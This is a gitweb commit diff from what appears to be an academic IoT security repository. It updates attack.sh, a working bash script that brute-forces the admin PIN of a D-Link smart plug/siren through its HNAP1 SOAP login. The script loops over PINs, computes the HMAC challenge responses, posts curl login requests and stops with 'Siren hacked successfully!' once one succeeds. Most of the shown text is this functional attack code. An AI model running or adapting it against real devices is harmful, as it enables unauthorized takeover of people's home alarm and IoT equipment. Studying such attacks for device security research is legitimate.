projects
/
iot2.git
/ commitdiff
commit
grep
author
committer
pickaxe
?
search:
re
summary
|
shortlog
|
log
|
commit
| commitdiff |
tree
raw
|
patch
|
inline
| side by side (from parent 1:
c74a8d5
)
Perfecting brute-force attack for D-Link alarm/siren; basically we have to always...
author
rtrimana
<rtrimana@uci.edu>
Thu, 21 Dec 2017 23:04:35 +0000
(15:04 -0800)
committer
rtrimana
<rtrimana@uci.edu>
Thu, 21 Dec 2017 23:04:35 +0000
(15:04 -0800)
benchmarks/other/DLinkAlarm/attack.sh
patch
|
blob
|
history
diff --git
a/benchmarks/other/DLinkAlarm/attack.sh
b/benchmarks/other/DLinkAlarm/attack.sh
index 39fb94eee0acf9d3ef42f26eeb72e965ed5b694f..609f95a49ce310afa50d0e1252a59f235e8b6d34 100755
(executable)
--- a/
benchmarks/other/DLinkAlarm/attack.sh
+++ b/
benchmarks/other/DLinkAlarm/attack.sh
@@
-1,7
+1,8
@@
#!/bin/bash
#modify next two line for your DSP-W215
#!/bin/bash
#modify next two line for your DSP-W215
-IP="192.168.0.35"
-PIN=215530
+IP="192.168.0.4"
+#PIN=0
+PIN=215500
#do not modify after this line if you don't know what you are doing
function usage {
#do not modify after this line if you don't know what you are doing
function usage {
@@
-29,6
+30,10
@@
end="</soap:Body></soap:Envelope>"
message="<Login xmlns=\"http://purenetworks.com/HNAP1/\"><Action>request</Action><Username>admin</Username><LoginPassword>$password</LoginPassword><Captcha/></Login>"
loginrequest="$head$message$end"
message="<Login xmlns=\"http://purenetworks.com/HNAP1/\"><Action>request</Action><Username>admin</Username><LoginPassword>$password</LoginPassword><Captcha/></Login>"
loginrequest="$head$message$end"
+loop=true
+while $loop
+ do
+
ret=`curl -s -X POST -H "$contentType" -H "$soapLogin" --data-binary "$loginrequest" http://$IP/HNAP1`
function getResult {
ret=`curl -s -X POST -H "$contentType" -H "$soapLogin" --data-binary "$loginrequest" http://$IP/HNAP1`
function getResult {
@@
-36,15
+41,12
@@
function getResult {
echo -n "$opt"
}
echo -n "$opt"
}
-PIN=0
-
-while true
- do
-echo -e $PIN
+echo -e "Current pin: $PIN"
let PIN=$PIN+1
challenge=`getResult Challenge`
cookie="Cookie: uid=`getResult Cookie`"
publickey="`getResult PublicKey`$PIN"
let PIN=$PIN+1
challenge=`getResult Challenge`
cookie="Cookie: uid=`getResult Cookie`"
publickey="`getResult PublicKey`$PIN"
+echo -e "Public key: $publickey"
privatekey=`hash_hmac "$challenge" "$publickey"`
password=`hash_hmac "$challenge" "$privatekey"`
timestamp=`date +%s`
privatekey=`hash_hmac "$challenge" "$publickey"`
password=`hash_hmac "$challenge" "$privatekey"`
timestamp=`date +%s`
@@
-60,6
+62,13
@@
login="$head$message$end"
mret=`curl -s -X POST -H "$contentType" -H "$soapLogin" -H "$hnap_auth" -H "$cookie" --data-binary "$login" http://$IP/HNAP1`
echo -e "$mret"
mret=`curl -s -X POST -H "$contentType" -H "$soapLogin" -H "$hnap_auth" -H "$cookie" --data-binary "$login" http://$IP/HNAP1`
echo -e "$mret"
+status=`echo -n "$mret" | grep -Po "(?<=<LoginResult>).*(?=</LoginResult>)"`
+echo -e "Status: $status\n\n"
+if [ $status = "success" ]
+then
+ echo -e "SUCCESSFUL ATTEMPT: Siren hacked successfully! The pin is: $PIN\n\n\n"
+ loop=false
+fi
done
done